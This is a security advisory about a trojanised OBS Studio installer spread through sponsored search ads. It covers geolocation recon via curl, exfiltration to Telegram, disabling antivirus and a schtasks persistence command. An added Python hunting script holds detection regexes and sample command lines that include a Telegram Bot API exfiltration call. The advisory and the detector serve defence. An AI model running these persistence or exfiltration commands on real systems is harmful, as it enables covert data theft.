Malicious Open Broadcaster Software (OBS) Studio Being Delivered Through Paid Sponsored Links
Enterprotect is actively monitoring a new iteration of malware distribution through the use of sponsored links. Specifically, we have identified a malicious version of the popular Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. This is a sophisticated attack that is designed to compromise devices and steal sensitive information.
The initial stage of the installation uses cURL to obtain country, IP, and city details from ipinfo.io as three separate requests. Once this information is acquired, it is sent to a Telegram chat using a hard-coded API account. This indicates that the attackers are using this information to target specific victims and may also be using it for future attacks.
Once the malware is installed, it systematically uses registry keys to disable core functionality, such as Windows Defender, and to uninstall Malwarebytes. To ensure persistence, it creates a scheduled task with the command: schtasks.exe /create /xml "C:\Users\[username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml"
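As an added illustration (not code from the advisory or from Enterprotect), the following Python hunts process-creation telemetry for the three stages described above: the curl requests to ipinfo.io, the Telegram hand-off, and the schtasks /create /xml persistence with a task file under a user's AppData\Roaming folder. The JSON event layout, the curl URLs and the Telegram Bot API path are assumptions about how such telemetry would look, and the sample events are constructed.

```python
import json
import re

# Constructed sample process-creation events in JSON-lines form (not from the
# advisory). The first three reproduce the chain the advisory describes on one
# host; the last two are benign look-alikes that the rules must not flag.
SAMPLE_EVENTS = [
    r'{"host":"WS01","cmdline":"schtasks.exe /create /xml \"C:\\Users\\alice\\AppData\\Roaming\\obs-studio\\bin\\64bit\\ar.xml\""}',
    r'{"host":"WS01","cmdline":"curl.exe -s https://ipinfo.io/city"}',
    r'{"host":"WS01","cmdline":"curl.exe -s https://api.telegram.org/bot<TOKEN>/sendMessage"}',
    r'{"host":"WS02","cmdline":"schtasks.exe /create /xml \"C:\\ProgramData\\Vendor\\backup.xml\""}',
    r'{"host":"WS02","cmdline":"curl.exe -s https://example.com/update.json"}',
]

# One rule per stage of the chain; each pattern runs over the command line.
RULES = {
    # schtasks /create /xml fed from a task definition under a user's
    # AppData\Roaming folder, as in the advisory's persistence step.
    "persistence_schtasks_xml": re.compile(
        r'schtasks(?:\.exe)?\s+/create\s+/xml\s+"?[a-z]:\\users\\[^\\"]+\\appdata\\roaming\\',
        re.IGNORECASE),
    # curl reaching ipinfo.io for geolocation (the recon stage).
    "recon_ipinfo": re.compile(r"\bcurl(?:\.exe)?\b.*\bipinfo\.io\b", re.IGNORECASE),
    # Telegram Bot API invoked straight from a command line (the exfil stage).
    "exfil_telegram": re.compile(r"api\.telegram\.org/bot", re.IGNORECASE),
}


def classify(event_json):
    """Return the names of the rules matching one JSON process-creation event."""
    cmdline = json.loads(event_json).get("cmdline", "")
    return [name for name, pat in RULES.items() if pat.search(cmdline)]


def hunt(events):
    """Map event index -> matching rule names; events with no match are omitted."""
    return {i: tags for i, ev in enumerate(events) if (tags := classify(ev))}


def hosts_with_full_chain(events):
    """Hosts on which every stage fired: the strongest signal of this campaign."""
    per_host = {}
    for ev in events:
        host = json.loads(ev)["host"]
        per_host.setdefault(host, set()).update(classify(ev))
    return sorted(h for h, tags in per_host.items() if tags == set(RULES))


if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS).items():
        print(idx, tags)
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

A single rule firing (for example curl to ipinfo.io) is weak on its own; the per-host correlation in hosts_with_full_chain is what separates this campaign from ordinary admin activity.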
It is important to note that Enterprotect’s SOC has seen indicators of compromise in our partners’ environments. This indicates that the attackers are actively targeting businesses and organizations, making it even more important to take steps to protect yourself.
To mitigate the risk of infection, we recommend the following:
Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites.
Only download software from legitimate websites and sources.
If paid software is being offered for free or at a discounted price, there is a higher chance it is malicious.
Enterprotect’s SOC will continue to actively monitor for any indicators of compromise associated with this campaign. We will also provide updates and additional information as it becomes available.
In conclusion, the distribution of malware through sponsored links is a sophisticated and evolving threat. It is important to remain vigilant and take steps to protect yourself and your organization from this type of attack. By following the recommendations above and staying informed about the latest threats, you can reduce the risk of infection and protect your sensitive information.